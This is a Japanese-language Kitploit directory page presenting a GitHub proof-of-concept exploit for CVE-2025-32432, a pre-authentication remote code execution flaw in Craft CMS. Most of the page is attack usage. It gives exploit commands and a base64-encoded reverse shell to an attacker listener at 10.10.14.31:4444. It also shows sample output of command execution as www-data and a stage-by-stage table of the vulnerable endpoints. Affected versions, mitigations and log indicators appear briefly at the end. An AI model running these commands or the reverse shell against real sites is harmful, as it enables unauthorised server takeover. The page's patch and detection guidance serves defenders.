Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32432 — エクスプロイト、CVE-2025-32432用のPoC、CraftCMS2Shell | Kitploit
ツール/GitHubGitHub/c0gnit00/cve-2025-32432
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

エクスプロイト、CVE-2025-32432用のPoC、CraftCMS2Shell

リポジトリを見る
321ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32432 Craft CMS 事前認証RCE PoC

Craft CMS における重大な事前認証リモートコード実行

対象: Craft CMS 3.x、4.x、5.x(5.6.16 まで)

情報: このエクスプロイトは HackTheBox の Orion マシンに対してテストされています

概要

このリポジトリには、Craft CMS における重大な事前認証リモートコード実行脆弱性である CVE-2025-32432 の概念実証エクスプロイトが含まれています。この脆弱性により、認証されていない攻撃者が、Yii2 のビヘイビアアタッチメント機構と __class オーバーライド手法による PHP オブジェクトインスタンス化を悪用して、サーバー上で任意の PHP コードを実行できます。

CVSS スコア: 10.0(重大)

機能

  • 事前認証での悪用 — ログイン資格情報は不要
  • 幅広い互換性 — Craft CMS 3.x、4.x、5.x で動作
  • アセットIDの自動探索 — 有効なアセットIDを自動でブルートフォース
  • CSRFトークン抽出 — Craft CMS の CSRF 保護を自動処理
  • セッションパスのフォールバック — 最初のパスが失敗した場合、代替の PHP セッションパスを自動再試行

要件

root@kitploit:~
pip install requests urllib3

クイックスタート

基本的なコマンド実行

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

リバースシェル

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

アセットIDブルートフォースのスキップ(既知の場合)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

代替セッションパスの使用

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

使用方法

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

出力例

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

エクスプロイトのステージ

ステージ操作エンドポイント認証
1セッションクッキーと CSRF トークンを抽出GET /admin/login不要
2セッションファイルに PHP ペイロードを注入GET /index.php?p=admin/dashboard&a=<PHP>不要
3有効なアセットIDをブルートフォースPOST /index.php?p=admin/actions/assets/generate-transform不要
4PhpManager ガジェット経由で RCE をトリガーPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>不要

影響を受けるバージョン

ブランチ影響を受けるバージョン修正バージョン
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

緩和策

  1. 直ちに最新の修正版へアップグレードする
  2. ログを監視して以下を確認:
    • /admin/actions/assets/generate-transform への複数の POST リクエスト
    • PHP コードを含む a= パラメータを伴う管理ページへの GET リクエスト
    • POST リクエストボディ内の as フィールドの存在
  3. WAF ルールを有効化して疑わしいパターンをブロック

クレジット

  • 最初の発見者: Orange Cyberdefense / SensePost
  • ブログ記事: CraftCMS の RCE を利用した実地キャンペーンの調査
  • PoC 作成者: SensePost の研究に基づき、HTB/ペネトレーションテスト用に改変

免責事項

このツールは許可されたセキュリティテストおよび研究目的のみに使用してください。コンピュータシステムへの不正アクセスは違法です。テストを行う前に必ず適切な許可を取得してください。

ライセンス

MIT ライセンス - 詳細は LICENSE ファイルを参照してください。

ツールをダウンロード